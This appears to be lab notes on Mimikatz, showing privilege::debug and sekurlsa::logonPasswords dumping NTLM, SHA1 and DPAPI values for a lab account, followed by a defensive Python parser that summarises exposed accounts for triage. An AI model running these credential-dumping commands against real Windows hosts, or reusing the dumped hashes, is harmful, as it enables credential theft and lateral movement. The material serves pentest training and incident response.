Mimikatz
Enable the debug privilege (after running Mimikatz as admin)
C:\Users\pparker\Downloads\mimikatz_trunk\x64>mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # privilege::debug
Privilege '20' OK
List the commands available in the sekurlsa module (entering the module name with no command prints its help)
mimikatz # sekurlsa::
ERROR mimikatz_doLocal ; "(null)" command of "sekurlsa" module not found !
Module : sekurlsa
Full name : SekurLSA module
Description : Some commands to enumerate credentials...
msv - Lists LM & NTLM credentials
wdigest - Lists WDigest credentials
kerberos - Lists Kerberos credentials
tspkg - Lists TsPkg credentials
livessp - Lists LiveSSP credentials
cloudap - Lists CloudAp credentials
ssp - Lists SSP credentials
logonPasswords - Lists all available providers credentials
process - Switch (or reinit) to LSASS process context
minidump - Switch (or reinit) to LSASS minidump context
bootkey - Set the SecureKernel Boot Key to attempt to decrypt LSA Isolated credentials
pth - Pass-the-hash
krbtgt - krbtgt!
dpapisystem - DPAPI_SYSTEM secret
trust - Antisocial
backupkeys - Preferred Backup Master keys
tickets - List Kerberos tickets
ekeys - List Kerberos Encryption Keys
dpapi - List Cached MasterKeys
credman - List Credentials Manager
Display the credentials held for current logon sessions
mimikatz # sekurlsa::logonPasswords
Authentication Id : 0 ; 426939 (00000000:000683bb)
Session : Interactive from 1
User Name : pparker
Domain : MARVEL
Logon Server : HYDRA-DC
Logon Time : 5/26/2025 10:25:53 PM
SID : S-1-5-21-817282392-3664699690-768258319-1106
msv :
[00000003] Primary
* Username : pparker
* Domain : MARVEL
* NTLM : 64f12cddaa88057e06a81b54e73b949b
* SHA1 : cba4e545b7ec918129725154b29f055e4cd5aea8
* DPAPI : 220a3e34eaf9b45b4bc0f153f861610b
tspkg :
wdigest :
* Username : pparker
* Domain : MARVEL
* Password : (null)
kerberos :
* Username : pparker
* Domain : MARVEL.LOCAL
* Password : (null)
ssp :
credman :
cloudap :
Authentication Id : 0 ; 426917 (00000000:000683a5)
Session : Interactive from 1
User Name : pparker
Domain : MARVEL
Logon Server : HYDRA-DC
Logon Time : 5/26/2025 10:25:53 PM
SID : S-1-5-21-817282392-3664699690-768258319-1106
msv :
[00000003] Primary
* Username : pparker
* Domain : MARVEL
* NTLM : 64f12cddaa88057e06a81b54e73b949b
* SHA1 : cba4e545b7ec918129725154b29f055e4cd5aea8
* DPAPI : 220a3e34eaf9b45b4bc0f153f861610b
tspkg :
wdigest :
* Username : pparker
* Domain : MARVEL
* Password : (null)
kerberos :
* Username : pparker
* Domain : MARVEL.LOCAL
* Password : (null)
ssp :
credman :
cloudap :
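For triage when output like the above appears in a pentest report or an incident, the following added example (not part of the original page or of Mimikatz) parses the sekurlsa::logonPasswords layout and reports, per account, how many logon sessions were listed and which credential fields were populated, without keeping the secret values. The function name exposure_by_account and the sample text with its <redacted> values are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample in the layout shown above; secret values are placeholders.
SAMPLE = """\
Authentication Id : 0 ; 426939 (00000000:000683bb)
User Name : pparker
Domain : MARVEL
msv :
* NTLM : <redacted>
* SHA1 : <redacted>
wdigest :
* Domain : MARVEL
* Password : (null)
Authentication Id : 0 ; 426917 (00000000:000683a5)
User Name : pparker
Domain : MARVEL
msv :
* NTLM : <redacted>
kerberos :
* Password : (null)
"""

SECRET_FIELDS = {"NTLM", "SHA1", "DPAPI", "Password"}
HEADER = re.compile(r"^(User Name|Domain)\s*:\s*(.*)$")   # session header lines
PROVIDER = re.compile(r"^(\w+)\s*:$")                     # e.g. "msv :"
FIELD = re.compile(r"^\*\s*(\w+)\s*:\s*(.*)$")            # e.g. "* NTLM : ..."

def exposure_by_account(text):
    """Map DOMAIN\\user -> session count and populated secret fields (values dropped)."""
    report = defaultdict(lambda: {"sessions": 0, "exposed": set()})
    user = key = provider = None
    for line in map(str.strip, text.splitlines()):
        if line.startswith("Authentication Id"):           # start of a new logon session
            user = key = provider = None
        elif (m := HEADER.match(line)) and key is None:
            if m.group(1) == "User Name":
                user = m.group(2)
            elif user is not None:                         # header Domain follows User Name
                key = f"{m.group(2)}\\{user}"
                report[key]["sessions"] += 1
        elif m := PROVIDER.match(line):
            provider = m.group(1)
        elif (m := FIELD.match(line)) and key and provider:
            name, value = m.groups()
            if name in SECRET_FIELDS and value not in ("", "(null)"):
                report[key]["exposed"].add(f"{provider}/{name}")
    return dict(report)
```

Several sessions for the same account collapse into one entry, so the result is the list of accounts whose credentials need rotating. A wdigest/Password entry in the result means a cleartext password was present in LSASS memory rather than only hashes.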